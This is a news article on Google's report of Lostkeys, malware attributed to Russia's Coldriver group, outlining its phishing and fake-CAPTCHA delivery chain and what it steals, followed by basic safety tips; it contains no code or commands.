malware Lostkeys

Lostkeys: Russian Malware That Can Drain Your Data in Seconds, Warns Google

by

Lostkeys Malware: Google’s Threat Intelligence Group (GTIG) has uncovered a dangerous new malware named ‘Lostkeys’, linked to the notorious Russian hacker group Coldriver. This malware is designed to steal sensitive files and system information and is deployed through a highly deceptive phishing campaign.

Coldriver—also known by aliases like UNC4057, Star Blizzard, and Callisto—has a history of targeting NATO governments, NGOs, military organizations, journalists, and diplomats through phishing emails.

How Lostkeys Malware Works

Unlike basic phishing attempts, Coldriver uses a multi-layered attack strategy to lure victims:

  1. Phishing Emails: The group sends emails posing as reputable institutions, embedding malicious links.

  2. Fake CAPTCHA Page: Clicking the link opens a fake website that displays a counterfeit CAPTCHA to seem legitimate.

  3. Malicious Script: Once the CAPTCHA is completed, a PowerShell script is silently copied to the user’s clipboard.

  4. User Prompt: The user is then prompted to run the script manually.

  5. System Checks: The malware checks screen resolution and detects whether the system is running in a virtual machine using MD5 hash checks.

  6. Final Payload: A Visual Basic Script (VBS) is executed—this is the actual Lostkeys malware.

What Can Lostkeys Do?

Once activated, Lostkeys can:

  • Steal files with specific extensions from targeted directories

  • Send system information and running processes to the attacker

  • Access emails and contacts—Coldriver’s primary targets

  • In some cases, the malware also searches for sensitive documents

First Detected in January 2025

Google reports that the first instance of Lostkeys was detected in January 2025, with follow-up activity recorded in March and April. This suggests the malware is still active and evolving.

A Growing Threat from Russian Hackers

Coldriver is a well-known advanced persistent threat (APT) group. Its phishing tactics are becoming increasingly sophisticated, making it harder for users to distinguish fake content from real websites or communications. The introduction of Lostkeys marks a new level of threat, particularly for individuals and organizations holding sensitive data.

How to Stay Safe

  • Never run scripts from unknown sources

  • Verify links and email senders before clicking

  • Use reliable antivirus and endpoint protection tools

  • Keep your system updated to avoid vulnerability exploits

  • Avoid downloading files from suspicious or unverified websites

Final Note: Lostkeys is a reminder that even one careless click can compromise an entire system. Cyber hygiene and vigilance are more important than ever in a world of evolving threats.

Leave a Comment